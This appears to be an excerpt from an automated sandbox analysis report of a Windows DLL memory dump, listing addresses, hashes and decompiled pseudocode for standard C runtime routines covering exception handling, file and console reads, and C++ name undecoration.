0x6e1aeae5
0x6e1aeae8
0x00000000
0x00000000
0x6e1aeae8
0x6e1aeadb
0x6e1aeadb
0x6e1aeade
0x00000000
0x00000000
0x6e1aeade
0x6e1aeace
0x6e1aeace
0x6e1aead1
0x00000000
0x00000000
0x6e1aead1
0x6e1aeaed
0x6e1aea99
0x6e1aea99
0x6e1aea99
0x6e1aea9c
0x6e1aea9c
0x6e1aea9e
0x6e1aeaa0
0x00000000
0x00000000
0x6e1aeaa2
0x6e1aeaa4
0x6e1aeab8
0x6e1aeab8
0x6e1aeaa6
0x6e1aeaa6
0x6e1aeaa9
0x6e1aeaac
0x00000000
0x6e1aeaae
0x6e1aeaae
0x6e1aeab1
0x6e1aeab4
0x6e1aeab6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1aeab6
0x6e1aeaac
0x6e1aeac1
0x6e1aeac1
0x6e1aeac3
0x00000000
0x6e1aeac5
0x6e1aeac5
0x6e1aeac5
0x00000000
0x6e1aeac3
0x6e1aeabc
0x6e1aeabe
0x6e1aeabe
0x00000000
0x6e1aeabe
0x6e1aea8b
0x6e1aea8b
0x6e1aea8e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1aea8e
0x6e1aea89
0x6e1aea81
0x6e1aeaf4
0x6e1aeaf8
0x6e1aeaf8
0x6e1ae5b7
0x6e1ae5b7
0x6e1ae5c0
0x6e1ae6c2
0x6e1ae6c2
0x00000000
0x6e1ae5ef
0x6e1ae5ef
0x6e1ae5f4
0x6e1ae6c4
0x6e1ae6c4
0x6e1ae6c7
0x00000000
0x6e1ae5fa
0x6e1ae5fa
0x6e1ae602
0x6e1ae8c6
0x6e1ae8ca
0x6e1ae608
0x6e1ae60d
0x6e1ae610
0x6e1ae615
0x6e1ae61c
0x6e1ae621
0x00000000
0x6e1ae659
0x6e1ae661
0x6e1ae6cc
0x6e1ae6cc
0x6e1ae6cf
0x6e1ae6d2
0x6e1ae6d2
0x6e1ae6d5
0x6e1ae6d8
0x6e1ae6de
0x6e1ae895
0x6e1ae895
0x6e1ae898
0x00000000
0x6e1ae89a
0x6e1ae89a
0x6e1ae89e
0x00000000
0x6e1ae8a4
0x6e1ae8a4
0x6e1ae8a7
0x6e1ae8aa
0x6e1ae8ab
0x6e1ae8ac
0x6e1ae8af
0x6e1ae8b0
0x6e1ae8b3
0x6e1ae8b4
0x6e1ae8b9
0x00000000
0x6e1ae8b9
0x6e1ae89e
0x6e1ae6e4
0x6e1ae6e4
0x6e1ae6e8
0x00000000
0x6e1ae6ee
0x6e1ae6ee
0x6e1ae6f5
0x6e1ae70d
0x6e1ae70d
0x6e1ae710
0x6e1ae716
0x6e1ae726
0x6e1ae72b
0x6e1ae72e
0x6e1ae731
0x6e1ae734
0x6e1ae737
0x6e1ae73a
0x6e1ae73d
0x6e1ae743
0x6e1ae743
0x6e1ae746
0x6e1ae749
0x6e1ae758
0x6e1ae759
0x6e1ae759
0x6e1ae75b
0x6e1ae75e
0x6e1ae764
0x6e1ae767
0x6e1ae76d
0x6e1ae76f
0x6e1ae772
0x6e1ae775
0x6e1ae77e
0x6e1ae781
0x6e1ae783
0x6e1ae783
0x6e1ae786
0x6e1ae789
0x6e1ae78c
0x6e1ae78f
0x6e1ae792
0x6e1ae797
0x6e1ae798
0x6e1ae799
0x6e1ae79a
0x6e1ae79b
0x6e1ae79e
0x6e1ae7a0
0x6e1ae7a2
0x00000000
0x6e1ae7a4
0x6e1ae7a4
0x6e1ae7a4
0x6e1ae7a7
0x6e1ae7aa
0x6e1ae7ac
0x6e1ae7ad
0x6e1ae7b2
0x6e1ae7b5
0x6e1ae7b7
0x00000000
0x00000000
0x6e1ae7b9
0x6e1ae7ba
0x6e1ae7bd
0x6e1ae7bf
0x00000000
0x6e1ae7c1
0x6e1ae7c1
0x6e1ae7c4
0x6e1ae7c7
0x00000000
0x6e1ae7c7
0x00000000
0x6e1ae7bf
0x6e1ae7db
0x6e1ae7e1
0x6e1ae7e5
0x6e1ae802
0x6e1ae807
0x6e1ae807
0x6e1ae80a
0x6e1ae80a
0x00000000
0x6e1ae7ca
0x6e1ae7ca
0x6e1ae7cb
0x6e1ae7ce
0x6e1ae7d1
0x6e1ae7d4
0x6e1ae7d4
0x00000000
0x6e1ae7d9
0x6e1ae775
0x6e1ae767
0x6e1ae80d
0x6e1ae810
0x6e1ae811
0x6e1ae814
0x6e1ae817
0x6e1ae81a
0x6e1ae81d
0x6e1ae81d
0x6e1ae826
0x6e1ae829
0x6e1ae829
0x6e1ae829
0x6e1ae73d
0x6e1ae82b
0x6e1ae82f
0x6e1ae831
0x6e1ae834
0x6e1ae83a
0x6e1ae83a
0x6e1ae83b
0x6e1ae83f
0x6e1ae8bc
0x6e1ae8bc
0x6e1ae8c1
0x6e1ae8c4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1ae841
0x6e1ae848
0x6e1ae84d
0x00000000
0x6e1ae84f
0x6e1ae84f
0x6e1ae853
0x6e1ae865
0x6e1ae868
0x6e1ae86b
0x6e1ae86d
0x6e1ae884
0x6e1ae888
0x6e1ae88e
0x6e1ae88f
0x6e1ae891
0x00000000
0x6e1ae893
0x00000000
0x6e1ae893
0x6e1ae86f
0x6e1ae874
0x6e1ae877
0x6e1ae87c
0x6e1ae87f
0x00000000
0x6e1ae87f
0x6e1ae855
0x6e1ae858
0x6e1ae85b
0x6e1ae85d
0x00000000
0x6e1ae85f
0x6e1ae85f
0x6e1ae863
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1ae863
0x6e1ae85d
0x6e1ae853
0x6e1ae84d
0x6e1ae6f7
0x6e1ae6f7
0x6e1ae6fe
0x00000000
0x6e1ae700
0x6e1ae700
0x6e1ae707
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1ae707
0x6e1ae6fe
0x6e1ae6f5
0x6e1ae6e8
0x6e1ae663
0x6e1ae66b
0x6e1ae66e
0x6e1ae673
0x6e1ae677
0x6e1ae67a
0x6e1ae680
0x6e1ae683
0x00000000
0x6e1ae685
0x6e1ae685
0x6e1ae688
0x6e1ae68a
0x6e1ae8cb
0x6e1ae8cb
0x6e1ae690
0x6e1ae690
0x6e1ae692
0x6e1ae695
0x6e1ae6b1
0x6e1ae6b2
0x6e1ae6b5
0x6e1ae6b8
0x6e1ae6ba
0x00000000
0x6e1ae6c0
0x00000000
0x6e1ae6c0
0x00000000
0x6e1ae6ba
0x6e1ae695
0x6e1ae8d0
0x6e1ae8d0
0x6e1ae8d2
0x6e1ae8d3
0x6e1ae8da
0x6e1ae8dd
0x6e1ae8eb
0x6e1ae8f0
0x6e1ae8f5
0x6e1ae8f8
0x6e1ae8fd
0x6e1ae900
0x6e1ae903
0x6e1ae906
0x6e1ae908
0x6e1ae90a
0x6e1ae90a
0x6e1ae90f
0x6e1ae91b
0x6e1ae921
0x6e1ae926
0x6e1ae929
0x6e1ae92a
0x00000000
0x6e1ae92a
0x6e1ae683
0x6e1ae661
0x6e1ae621
0x6e1ae602
0x6e1ae5f4
0x6e1ae5c0

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E1AE67A
type_info::operator==.LIBVCRUNTIME ref: 6E1AE6A1
___TypeMatch.LIBVCRUNTIME ref: 6E1AE7AD
CatchIt.LIBVCRUNTIME ref: 6E1AE802
IsInExceptionSpec.LIBVCRUNTIME ref: 6E1AE888
_UnwindNestedFrames.LIBCMT ref: 6E1AE90F
CallUnexpected.LIBVCRUNTIME ref: 6E1AE92A

Strings

csm, xrefs: 6E1AE627
csm, xrefs: 6E1AE6D8
csm, xrefs: 6E1AE5BA

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: c1d947b39435c41912c6adcc9a45dff5c2088ea00bbacaef1d39d409bcc1ae01
Instruction ID: 66ea7e30fdb3a49434b6b2e142b886b9bc8c12557450d240f581851ce11d953e
Opcode Fuzzy Hash: c1d947b39435c41912c6adcc9a45dff5c2088ea00bbacaef1d39d409bcc1ae01
Instruction Fuzzy Hash: 32C16879C002099FCF15CFE8C8809AEBBB9BF14314F10485AEA256B255C731DAD1EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D748A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6E1D748A(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E6E1C23E1(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E6E1C23F4( *_t137))) = 9;
						L60:
						_t139 = E6E1C22C2();
						goto L61;
					}
					__eflags = _t198 -  *0x6e222290; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x6e222090 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E6E1C23E1(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0x16;
								E6E1C22C2();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E6E1D1C1E(_t154);
								E6E1D1BE4(0);
								E6E1D1BE4(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E6E1D7BFB(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E6E1E2886(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E6E1C23BE(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E6E1C23F4(__eflags))) = 9;
											 *(E6E1C23E1(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E6E1D6F6F();
												} else {
													_t170 = E6E1D72FB();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E6E1D71A4(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t108 =  &_v28; // 0xa
									_t174 = GetConsoleMode( *_t108,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0xc;
									 *(E6E1C23E1(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E6E1D1BE4(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E6E1C23E1(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E6E1C23E1(_t246)) =  *_t197 & 0x00000000;
					_t139 = E6E1C23F4(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x6e1d7493
0x6e1d7497
0x6e1d749a
0x6e1d74b4
0x6e1d74b6
0x6e1d781b
0x6e1d781b
0x6e1d7820
0x6e1d7820
0x6e1d7828
0x6e1d782e
0x6e1d782e
0x00000000
0x6e1d782e
0x6e1d74bc
0x6e1d74c2
0x00000000
0x00000000
0x6e1d74cc
0x6e1d74d2
0x6e1d74d5
0x6e1d74d8
0x6e1d74e2
0x6e1d74e5
0x6e1d74e8
0x6e1d74ec
0x6e1d74ee
0x00000000
0x00000000
0x6e1d74f4
0x6e1d74f7
0x6e1d74fd
0x6e1d7517
0x6e1d7519
0x6e1d7817
0x00000000
0x6e1d7817
0x6e1d751f
0x6e1d7522
0x00000000
0x00000000
0x6e1d7528
0x6e1d752c
0x00000000
0x00000000
0x6e1d7532
0x6e1d7535
0x6e1d7539
0x6e1d7540
0x6e1d7542
0x6e1d7542
0x6e1d7545
0x6e1d759a
0x6e1d759c
0x6e1d7562
0x6e1d7567
0x6e1d756e
0x6e1d7574
0x00000000
0x6e1d759e
0x6e1d75a0
0x6e1d75a1
0x6e1d75a3
0x6e1d75a6
0x6e1d75a8
0x6e1d75aa
0x6e1d75ac
0x6e1d75ac
0x6e1d75b7
0x6e1d75b9
0x6e1d75c0
0x6e1d75c5
0x6e1d75c8
0x6e1d75cb
0x6e1d75cd
0x6e1d75f1
0x6e1d75f9
0x6e1d75fc
0x6e1d7603
0x6e1d760a
0x6e1d760e
0x6e1d7610
0x6e1d7613
0x6e1d761a
0x6e1d761a
0x6e1d761d
0x6e1d761f
0x6e1d7622
0x6e1d7627
0x6e1d762a
0x6e1d7633
0x6e1d7637
0x6e1d763a
0x6e1d763c
0x6e1d7642
0x6e1d7644
0x6e1d764d
0x6e1d764e
0x6e1d7650
0x6e1d7654
0x6e1d7655
0x6e1d7659
0x6e1d765c
0x6e1d7666
0x6e1d766b
0x6e1d766e
0x6e1d767d
0x6e1d7681
0x6e1d7684
0x6e1d7686
0x6e1d7688
0x6e1d768a
0x6e1d768f
0x6e1d7691
0x6e1d7695
0x6e1d7696
0x6e1d769c
0x6e1d76a6
0x6e1d76a7
0x6e1d76aa
0x6e1d76af
0x6e1d76b2
0x6e1d76c1
0x6e1d76c5
0x6e1d76c8
0x6e1d76ca
0x6e1d76cc
0x6e1d76ce
0x6e1d76d0
0x6e1d76d6
0x6e1d76d6
0x6e1d76d7
0x6e1d76e6
0x6e1d76e9
0x6e1d76ea
0x6e1d76ea
0x6e1d76ce
0x6e1d76ca
0x6e1d76b2
0x6e1d768a
0x6e1d7686
0x6e1d766e
0x6e1d7644
0x6e1d763c
0x6e1d76f0
0x6e1d76f6
0x6e1d76f8
0x6e1d776b
0x6e1d776b
0x6e1d776f
0x6e1d777f
0x6e1d7785
0x6e1d7787
0x6e1d77e3
0x6e1d77e3
0x6e1d77eb
0x6e1d77ec
0x6e1d77ee
0x6e1d7807
0x6e1d780a
0x6e1d7747
0x6e1d7748
0x00000000
0x6e1d774d
0x6e1d7810
0x00000000
0x6e1d7810
0x6e1d77f5
0x6e1d7800
0x00000000
0x6e1d7800
0x6e1d7789
0x6e1d778c
0x6e1d778f
0x00000000
0x00000000
0x6e1d7791
0x6e1d7791
0x6e1d7794
0x6e1d7797
0x6e1d779a
0x6e1d77a1
0x6e1d77a6
0x6e1d77a8
0x6e1d77ac
0x6e1d77c7
0x6e1d77cb
0x6e1d77cc
0x6e1d77cf
0x6e1d77d0
0x6e1d77dc
0x6e1d77d2
0x6e1d77d2
0x6e1d77d2
0x6e1d77ae
0x6e1d77ae
0x6e1d77ae
0x6e1d77b9
0x6e1d77be
0x6e1d77c1
0x6e1d77c1
0x00000000
0x6e1d77a6
0x6e1d76fd
0x6e1d7700
0x6e1d7707
0x6e1d770c
0x00000000
0x00000000
0x6e1d7712
0x6e1d7715
0x6e1d771b
0x6e1d771d
0x00000000
0x00000000
0x6e1d771f
0x6e1d7723
0x00000000
0x00000000
0x6e1d7737
0x6e1d773d
0x6e1d773f
0x6e1d7763
0x6e1d7766
0x00000000
0x6e1d7766
0x6e1d7741
0x00000000
0x6e1d75cf
0x6e1d75d4
0x6e1d75df
0x6e1d774e
0x6e1d774e
0x6e1d774e
0x6e1d7751
0x6e1d7752
0x00000000
0x6e1d775a
0x6e1d75cd
0x6e1d759c
0x6e1d7547
0x6e1d754a
0x6e1d755e
0x6e1d7560
0x6e1d7581
0x6e1d7584
0x6e1d7587
0x6e1d758a
0x00000000
0x6e1d758a
0x00000000
0x6e1d754c
0x6e1d754c
0x6e1d754f
0x6e1d7552
0x00000000
0x6e1d7552
0x6e1d754a
0x6e1d74ff
0x6e1d7504
0x6e1d750c
0x00000000
0x6e1d749c
0x6e1d74a1
0x6e1d74a4
0x6e1d74a9
0x6e1d7833
0x00000000
0x6e1d7833

Strings

, xrefs: 6E1D7712

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 6ef844aac5446da5503d0e4e546885856194be83d3454612bff35d05634fbf67
Instruction ID: c408524eb839dbce3bacbda85d8342d76dbbf3dc9bc9cca2dc85c5dacf4e751e
Opcode Fuzzy Hash: 6ef844aac5446da5503d0e4e546885856194be83d3454612bff35d05634fbf67
Instruction Fuzzy Hash: C8C114B0A046459FDF01CFECC894BADBBB5AF2A314F10495AE910AB3C1D77099C9DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B5444, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E1B5444(void* __ebx, void* __edx, void* __edi, void* __esi, char** _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char** _v48;
				char _v56;
				char _v64;
				signed int _t50;
				char** _t56;
				char** _t57;
				char** _t59;
				char* _t65;
				char** _t76;
				intOrPtr* _t77;
				intOrPtr _t78;
				char* _t85;
				char _t86;
				signed int* _t114;
				char* _t117;
				intOrPtr* _t120;
				signed int* _t121;
				intOrPtr _t123;
				intOrPtr* _t124;
				signed int _t126;

				_t116 = __edi;
				_t115 = __edx;
				_t50 =  *0x6e21801c; // 0xd8901f95
				_v8 = _t50 ^ _t126;
				_t84 = _a4;
				_t120 =  *0x6e221b68; // 0x0
				_v48 = _a4;
				_t86 =  *_t120;
				_t53 = _t86 + 0xffffffd0;
				_v33 = _t86;
				if(_t86 + 0xffffffd0 > 9) {
					_push(__edi);
					if(_t86 != 0x3f) {
						if(E6E1B58E3(_t120, "template-parameter-", 0x13) != 0) {
							if(E6E1B58E3(_t120, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t56 = E6E1AF6E4( &_v56, 0x6e221b68, 0x40);
									L20:
									_t85 = _t56[1];
									_t117 =  *_t56;
								} else {
									_t117 = 0;
									_t85 = 0;
									 *0x6e221b68 = _t120 + 1;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t123 = _t120 + 0xd;
							_v28 = 0xe;
							L9:
							 *0x6e221b68 = _t123;
							E6E1B4197(_t115, _t116,  &_v44);
							if(( *0x6e221b70 & 0x00004000) == 0 ||  *0x6e221b78 == 0) {
								E6E1AFB8D(E6E1AF764( &_v56,  &_v32),  &_v32,  &_v44);
								_t65 =  &_v64;
								goto L14;
							} else {
								E6E1B4226( &_v44,  &_v24, 0x10);
								_t124 =  *0x6e221b78; // 0x0
								 *0x6e1ee1b4(E6E1CF009( &_v44,  &_v24));
								if( *_t124() == 0) {
									E6E1AFB8D(E6E1AF764( &_v64,  &_v32),  &_v32,  &_v44);
									_t65 =  &_v56;
									L14:
									_t56 = E6E1AFBAF( &_v32, _t65, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t56 = E6E1AF511( &_v44, _t71);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t123 = _t120 + 0x13;
						_v28 = 0x14;
						goto L9;
					} else {
						_t76 = E6E1B468B(__edx,  &_v44, 0);
						_t117 =  *_t76;
						_t85 = _t76[1];
						_t77 =  *0x6e221b68; // 0x0
						_v32 = _t117;
						_v28 = _t85;
						_t78 = _t77 + 1;
						 *0x6e221b68 = _t78;
						if( *_t77 != 0x40) {
							_t79 = _t78 - 1;
							 *0x6e221b68 = _t78 - 1;
							E6E1AFA80( &_v32, (0 |  *_t79 != 0x00000000) + 1);
							_t85 = _v28;
							_t117 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t121 =  *0x6e221b60; // 0x0
							if( *_t121 != 9 && _t117 != 0) {
								_t59 = E6E1B2E9E(0x6e221b84, 8);
								if(_t59 != 0) {
									 *_t59 = _t117;
									_t59[1] = _t85;
									 *_t121 =  *_t121 + 1;
									 *(_t121 + 4 +  *_t121 * 4) = _t59;
								}
							}
						}
						_t57 = _v48;
						 *_t57 = _t117;
						_t57[1] = _t85;
						goto L27;
					}
				} else {
					_t114 =  *0x6e221b60; // 0x0
					 *0x6e221b68 = _t120 + 1;
					E6E1AFAB2(_t114, _t84, _t53);
					L27:
					return E6E1A93EA(_v8 ^ _t126);
				}
			}

0x6e1b5444
0x6e1b5444
0x6e1b544a
0x6e1b5451
0x6e1b5455
0x6e1b5459
0x6e1b545f
0x6e1b5462
0x6e1b5467
0x6e1b546a
0x6e1b5470
0x6e1b548d
0x6e1b5491
0x6e1b54f5
0x6e1b551c
0x6e1b55e7
0x6e1b5606
0x6e1b560b
0x6e1b560b
0x6e1b560e
0x6e1b55ef
0x6e1b55ef
0x6e1b55f2
0x6e1b55f4
0x6e1b55f4
0x00000000
0x6e1b55e7
0x6e1b5522
0x6e1b5529
0x6e1b552c
0x6e1b5533
0x6e1b5536
0x6e1b553d
0x6e1b554d
0x6e1b55d9
0x6e1b55de
0x00000000
0x6e1b5558
0x6e1b5561
0x6e1b5566
0x6e1b5579
0x6e1b5584
0x6e1b55ae
0x6e1b55b3
0x6e1b55b6
0x6e1b55bc
0x00000000
0x6e1b55bc
0x6e1b5586
0x6e1b558d
0x6e1b5591
0x00000000
0x6e1b5591
0x6e1b554d
0x6e1b54f7
0x6e1b54fe
0x6e1b5501
0x00000000
0x6e1b5493
0x6e1b5499
0x6e1b54a0
0x6e1b54a2
0x6e1b54a5
0x6e1b54aa
0x6e1b54ad
0x6e1b54b2
0x6e1b54b3
0x6e1b54bb
0x6e1b54c1
0x6e1b54c4
0x6e1b54d3
0x6e1b54d8
0x6e1b54db
0x6e1b54db
0x6e1b5610
0x6e1b5614
0x6e1b5616
0x6e1b561f
0x6e1b562c
0x6e1b5633
0x6e1b5635
0x6e1b5637
0x6e1b563a
0x6e1b563e
0x6e1b563e
0x6e1b5633
0x6e1b561f
0x6e1b5642
0x6e1b5645
0x6e1b5647
0x00000000
0x6e1b564a
0x6e1b5472
0x6e1b5472
0x6e1b547b
0x6e1b5481
0x6e1b564b
0x6e1b5658
0x6e1b5658

APIs

Replicator::operator[].LIBVCRUNTIME ref: 6E1B5481
DName::operator=.LIBVCRUNTIME ref: 6E1B54D3

Strings

generic-type-, xrefs: 6E1B550C
template-parameter-, xrefs: 6E1B54E5
@, xrefs: 6E1B55E9

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
